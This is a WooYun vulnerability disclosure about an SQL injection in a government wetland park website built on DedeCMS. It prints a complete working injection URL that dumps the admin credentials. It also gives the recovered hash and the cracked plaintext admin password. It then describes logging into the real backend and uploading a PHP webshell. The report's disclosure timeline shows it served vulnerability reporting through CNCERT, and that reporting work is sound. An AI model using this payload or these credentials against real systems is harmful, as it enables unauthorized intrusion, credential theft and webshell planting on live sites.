当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-041541

漏洞标题:汉江国家湿地公园管委会sql注射漏洞一枚

相关厂商:政府

漏洞作者: JiuShao

提交时间:2013-10-31 14:22

修复时间:2013-12-15 14:22

公开时间:2013-12-15 14:22

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:5

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-10-31: 细节已通知厂商并且等待厂商处理中
2013-11-04: 厂商已经确认,细节仅向厂商公开
2013-11-14: 细节向核心白帽子及相关领域专家公开
2013-11-24: 细节向普通白帽子公开
2013-12-04: 细节向实习白帽子公开
2013-12-15: 细节向公众公开

简要描述:

汉江国家湿地公园管委会sql注射漏洞一枚

详细说明:

漏洞站点:http://www.hjsd.cn/ 织梦系统
后台admin
注入语句:http://www.hjsd.cn/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a

1.jpg


爆出账号admin md5:52aea421ef89f1acd2bc 去前三后一 ea421ef89f1acd2b 解密为5990401182
进入后台 直接上传php大马

2.jpg


webshell在截图后以删除

漏洞证明:

1.jpg

2.jpg

修复方案:

补丁、。

版权声明:转载请注明来源 JiuShao@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2013-11-04 20:03

厂商回复:

最新状态:

暂无